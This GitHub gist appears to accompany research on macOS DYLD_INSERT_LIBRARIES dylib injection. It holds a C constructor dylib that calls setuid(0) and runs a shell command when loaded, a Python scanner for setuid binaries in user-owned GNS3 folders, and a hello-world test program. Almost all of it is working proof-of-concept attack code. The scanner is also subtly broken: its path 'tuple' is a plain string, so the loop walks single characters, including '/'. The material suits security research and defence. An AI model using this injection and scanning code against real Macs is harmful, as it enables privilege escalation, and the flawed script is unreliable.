Skip to content

Instantly share code, notes, and snippets.

@theevilbit
Last active December 16, 2024 03:57
Show Gist options
  • Save theevilbit/3574df063cf9e2c3ba6c57aca5dff022 to your computer and use it in GitHub Desktop.
Save theevilbit/3574df063cf9e2c3ba6c57aca5dff022 to your computer and use it in GitHub Desktop.
DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX deep dive
#include <stdio.h>
#include <syslog.h>
#include <stdlib.h>
__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
setuid(0);
system("id");
printf("Hello from dylib!\n");
syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}
#!/usr/bin/python3
import os
import getpass
from pathlib import Path
binaryPaths = ('/Applications/GNS3/Resources/')
username = getpass.getuser()
for binaryPath in binaryPaths:
for rootDir,subDirs,subFiles in os.walk(binaryPath):
for subFile in subFiles:
absPath = os.path.join(rootDir,subFile)
try:
permission = oct(os.stat(absPath).st_mode)[-4:]
specialPermission = permission[0]
if int(specialPermission) >= 4:
p = Path(os.path.abspath(os.path.join(absPath, os.pardir)))
if p.owner() == username:
print("Potential issue found, owner of parent folder is:", username)
print(permission , absPath)
except:
pass
#include <stdio.h>
int main() {
printf("Hello world\n");
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment